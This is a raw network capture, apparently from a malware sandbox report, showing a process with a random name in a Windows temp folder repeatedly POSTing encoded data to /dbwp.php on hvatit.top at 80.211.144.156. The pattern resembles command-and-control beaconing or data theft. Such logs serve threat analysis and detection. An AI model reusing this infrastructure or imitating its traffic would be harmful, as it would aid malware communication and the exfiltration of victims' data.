                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:15.616501093 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:15.974195004 CEST | 2560 | OUT | Data Raw: 5a 5a 59 5e 5a 5d 50 53 5d 5f 54 57 54 50 5b 56 5a 55 59 5e 52 52 54 58 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZZY^Z]PS]_TWTP[VZUY^RRTXQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.\'!6@?:;5>,-3Z 8'33%$'=>W?;X??,!]'/Z,
                                                        Aug 31, 2024 09:33:16.290431023 CEST | 25 | IN | HTTP/1.1 100 Continue


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        79 | 192.168.2.4 | 49816 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:16.371011972 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1436
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:16.724250078 CEST | 1436 | OUT | Data Raw: 5f 5e 59 5f 5f 59 50 56 5d 5f 54 57 54 59 5b 54 5a 53 59 53 52 5c 54 58 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _^Y__YPV]_TWTY[TZSYSR\TXQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-$!1?9,T">:Z04;<S&*V$C#3=*;<<,?!]'/Z,!
                                                        Aug 31, 2024 09:33:17.033657074 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:17.227669001 CEST | 308 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:16 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 152
                                                        Connection: keep-alive
                                                        Data Raw: 0c 15 23 1e 24 06 22 1c 34 3b 2e 55 2a 02 00 0d 24 09 3b 5e 38 0f 00 12 3e 07 23 59 3e 39 3f 0c 24 3d 01 07 33 06 00 12 25 06 37 0e 24 1e 21 5b 07 10 22 10 24 3e 3c 02 3b 12 0f 01 26 0e 25 1d 34 32 25 02 29 13 03 13 22 15 3d 5f 30 3b 21 0c 2c 17 0b 0e 2b 00 05 5f 29 28 20 5a 26 02 2b 50 00 12 25 09 25 59 20 11 20 2d 39 03 22 3b 2b 1e 27 0b 3b 59 22 2b 06 5a 29 3b 29 54 27 2f 2d 0f 20 33 2d 59 31 54 2d 04 3c 07 2f 51 2a 2c 26 5d 2e 01 23 56 02 36 59 56
                                                        Data Ascii: #$"4;.U*$;^8>#Y>9?$=3%7$!["$><;&%42%)"=_0;!,+_)( Z&+P%%Y -9";+';Y"+Z);)T'/- 3-Y1T-</Q*,&].#V6YV


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        80 | 192.168.2.4 | 49817 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:16.489413023 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:16.833585024 CEST | 2560 | OUT | Data Raw: 5a 58 59 50 5a 5c 55 57 5d 5f 54 57 54 50 5b 53 5a 5c 59 59 52 53 54 5d 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZXYPZ\UW]_TWTP[SZ\YYRST]Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.&29=)?!._./77;(09;'?X&.:S<3^? //!]'/Z,
                                                        Aug 31, 2024 09:33:17.155603886 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:17.357213020 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:16 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        81 | 192.168.2.4 | 49818 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:17.478358030 CEST | 218 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:33:17.840650082 CEST | 2560 | OUT | Data Raw: 5a 55 59 5e 5f 58 55 50 5d 5f 54 57 54 5d 5b 54 5a 52 59 5a 52 54 54 58 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZUY^_XUP]_TWT][TZRYZRTTXQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-0:D? ".(_-,8#;$*0V0'="R+<?,!]'/Z,1
                                                        Aug 31, 2024 09:33:18.162486076 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:18.295625925 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        82 | 192.168.2.4 | 49819 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:18.411695957 CEST | 218 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:33:18.771070004 CEST | 2560 | OUT | Data Raw: 5a 5c 59 54 5a 55 55 52 5d 5f 54 57 54 5c 5b 53 5a 50 59 58 52 5d 54 59 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z\YTZUUR]_TWT\[SZPYXR]TYQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-0:D<S5X8].'4;;'70%?'[=?#Y?(/!]'/Z,5
                                                        Aug 31, 2024 09:33:19.076108932 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:19.555448055 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        83 | 192.168.2.4 | 49820 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:19.680013895 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:20.036715031 CEST | 2560 | OUT | Data Raw: 5a 5d 59 50 5a 5c 50 57 5d 5f 54 57 54 59 5b 56 5a 5c 59 5a 52 52 54 58 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z]YPZ\PW]_TWTY[VZ\YZRRTXQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-'-+T">,- ;3)?$6?X3=*?++_+?$;/!]'/Z,!
                                                        Aug 31, 2024 09:33:20.345278025 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:20.476279974 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        84 | 192.168.2.4 | 49821 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:20.623389006 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:20.974221945 CEST | 2560 | OUT | Data Raw: 5a 5c 59 5e 5f 5d 50 5d 5d 5f 54 57 54 5b 5b 53 5a 56 59 5b 52 50 54 5d 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z\Y^_]P]]_TWT[[SZVY[RPT]Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-01E+#!> ^:?$ + U09<W0&83.-<;?X+'8?!]'/Z,)
                                                        Aug 31, 2024 09:33:21.306494951 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:21.503901958 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        85 | 192.168.2.4 | 49822 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:21.633122921 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:21.989938021 CEST | 2560 | OUT | Data Raw: 5a 55 5c 55 5a 58 50 53 5d 5f 54 57 54 5f 5b 57 5a 55 59 5b 52 5d 54 5a 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZU\UZXPS]_TWT_[WZUY[R]TZQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-&!<:4V#- \-/0 ;U0(Q'#_$-9(]/Y< /!]'/Z,


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        86 | 192.168.2.4 | 49823 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:22.245878935 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1436
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:22.599284887 CEST | 1436 | OUT | Data Raw: 5a 5e 59 5e 5f 5a 55 51 5d 5f 54 57 54 5e 5b 53 5a 5c 59 5b 52 53 54 5c 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z^Y^_ZUQ]_TWT^[SZ\Y[RST\Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.['1*B<)'6>,:8#4S$9$'&''-2<8/<W/!]'/Z,=
                                                        Aug 31, 2024 09:33:22.946997881 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:23.075532913 CEST | 308 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 152
                                                        Connection: keep-alive
                                                        Data Raw: 0c 15 20 0d 33 06 2e 57 37 15 31 0f 3d 3c 2e 0d 33 30 23 5a 38 0f 26 13 29 29 33 12 29 14 20 1d 25 3e 30 5e 25 28 29 0e 25 06 24 1e 25 34 21 5b 07 10 21 00 25 3e 01 59 3b 12 04 12 26 20 26 00 21 31 0b 07 2a 03 00 00 35 3b 25 5d 33 28 2e 50 2f 07 36 50 3f 2d 2c 03 2a 06 3f 06 32 28 2b 50 00 12 25 0e 24 3f 38 1c 35 2e 0b 01 22 01 23 10 24 1b 0d 1d 34 15 01 03 29 2b 35 57 30 3c 25 0c 21 20 0f 5e 25 22 3e 14 28 10 0e 0a 2a 16 26 5d 2e 01 23 56 02 36 59 56
                                                        Data Ascii: 3.W71=<.30#Z8&))3) %>0^%()%$%4![!%>Y;& &!1*5;%]3(.P/6P?-,*?2(+P%$?85."#$4)+5W0<%! ^%">(*&].#V6YV


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        87 | 192.168.2.4 | 49824 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:22.369270086 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:22.724400997 CEST | 2560 | OUT | Data Raw: 5f 5d 59 51 5f 58 50 53 5d 5f 54 57 54 5c 5b 56 5a 56 59 5e 52 50 54 5c 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _]YQ_XPS]_TWT\[VZVY^RPT\Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.\'W.A(*4V5>/9<#];'7$%'[$[%?;'\=,/,!]'/Z,5
                                                        Aug 31, 2024 09:33:23.077832937 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:23.212593079 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        88 | 192.168.2.4 | 49825 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:23.349055052 CEST | 218 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:33:23.692984104 CEST | 2560 | OUT | Data Raw: 5a 59 59 53 5f 5a 50 56 5d 5f 54 57 54 59 5b 5c 5a 5d 59 5e 52 57 54 5d 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZYYS_ZPV]_TWTY[\Z]Y^RWT]Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.06E++54-,4 T3)(U&6+'.W?X=<+;?!]'/Z,!
                                                        Aug 31, 2024 09:33:24.015029907 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:24.144100904 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:23 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        89 | 192.168.2.4 | 49826 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:24.272403002 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:24.630479097 CEST | 2560 | OUT | Data Raw: 5a 59 59 56 5a 5a 50 5c 5d 5f 54 57 54 5b 5b 50 5a 57 59 5c 52 53 54 58 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZYYVZZP\]_TWT[[PZWY\RSTXQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-'22<)!(9?0#88'4Q0($=?;;_+R,!]'/Z,)
                                                        Aug 31, 2024 09:33:24.951540947 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:25.081434011 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        90 | 192.168.2.4 | 49827 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:25.209431887 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:25.568027973 CEST | 2560 | OUT | Data Raw: 5a 5f 5c 55 5a 58 55 57 5d 5f 54 57 54 50 5b 54 5a 52 59 5e 52 52 54 5c 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z_\UZXUW]_TWTP[TZRY^RRT\Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.]31%?,V".?3X7;0$+'-.+,(,?,?!]'/Z,
                                                        Aug 31, 2024 09:33:25.874866009 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:26.067982912 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        91 | 192.168.2.4 | 49828 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:26.197001934 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:26.552320004 CEST | 2560 | OUT | Data Raw: 5a 5c 59 53 5a 5e 50 56 5d 5f 54 57 54 5e 5b 50 5a 52 59 52 52 55 54 5c 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
